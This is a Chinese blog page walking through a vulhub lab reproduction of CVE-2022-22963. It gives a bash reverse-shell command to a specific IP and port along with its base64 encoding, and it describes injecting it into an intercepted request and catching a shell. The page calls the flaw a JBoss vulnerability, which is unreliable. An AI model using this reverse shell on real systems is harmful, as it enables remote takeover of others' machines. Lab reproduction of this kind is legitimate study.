当前位置: 首页 > news >正文

vulhub远程执行命令漏洞CVE-2022-22963

news 来源:原创 2024/9/20 9:33:06

1.开启环境

2.访问目标网址,是关于JBoss中间件的漏洞

3.构造反弹shell的payload

将其进行base64编码

bash -i >& /dev/tcp/47.121.191.208/8898 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMTkxLjIwOC84ODk4IDA+JjE=

4.通过抓包,将payload带进数据包中,放行

5.云服务器进行监听8898端口

6.放行后弹到shell,执行ls测试一下

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • flutter的入口和原生交互
  • Svn常用操作技巧详细说明
  • ES模块导入、导出学习笔记
  • Python条形码生成
  • Linux中的时间
  • Python中的`range()`函数及其用法
  • 九、制作卡牌预制体
  • windows清理图标缓存
  • 群晖最新版(DSM 7.2) 下使用 Web Station 部署 flask 项目
  • Xilinx FPGA 原语解析(二):IBUFDS差分输入缓冲器(示例源码及仿真)
  • Nosql数据库
  • 算法复杂度的简单介绍
  • 程序的格式框架与缩进
  • Unity之获取Avpro视频画面并在本地创建缩略图
  • 手机扬声器音量总是不够大?试试“扬声器助推器”吧
  • 5、React组件事件详解
  • docker-consul
  • java B2B2C 源码多租户电子商城系统-Kafka基本使用介绍
  • JavaScript 基本功--面试宝典
  • spring boot 整合mybatis 无法输出sql的问题
  • 代理模式
  • 多线程 start 和 run 方法到底有什么区别?
  • 如何使用 OAuth 2.0 将 LinkedIn 集成入 iOS 应用
  • 适配mpvue平台的的微信小程序日历组件mpvue-calendar
  • 腾讯大梁:DevOps最后一棒,有效构建海量运营的持续反馈能力
  • 想写好前端,先练好内功
  • 小程序button引导用户授权
  • 小而合理的前端理论:rscss和rsjs
  • 一起来学SpringBoot | 第三篇:SpringBoot日志配置
  • 移动端解决方案学习记录
  • Hibernate主键生成策略及选择
  • UI设计初学者应该如何入门?
  • 正则表达式-基础知识Review
  • ​浅谈 Linux 中的 core dump 分析方法
  • # Pytorch 中可以直接调用的Loss Functions总结:
  • #70结构体案例1(导师,学生,成绩)
  • #ifdef 的技巧用法
  • #免费 苹果M系芯片Macbook电脑MacOS使用Bash脚本写入(读写)NTFS硬盘教程
  • #数据结构 笔记三
  • $.ajax()
  • (6)添加vue-cookie
  • (C++)栈的链式存储结构(出栈、入栈、判空、遍历、销毁)(数据结构与算法)
  • (java版)排序算法----【冒泡,选择,插入,希尔,快速排序,归并排序,基数排序】超详细~~
  • (LLM) 很笨
  • (初研) Sentence-embedding fine-tune notebook
  • (附源码)基于SpringBoot和Vue的厨到家服务平台的设计与实现 毕业设计 063133
  • (附源码)计算机毕业设计SSM疫情居家隔离服务系统
  • (附源码)计算机毕业设计SSM在线影视购票系统
  • (七)Java对象在Hibernate持久化层的状态
  • (深度全面解析)ChatGPT的重大更新给创业者带来了哪些红利机会
  • (实战篇)如何缓存数据
  • (一) storm的集群安装与配置
  • (原)记一次CentOS7 磁盘空间大小异常的解决过程
  • (轉貼) 寄發紅帖基本原則(教育部禮儀司頒布) (雜項)
  • (自用)交互协议设计——protobuf序列化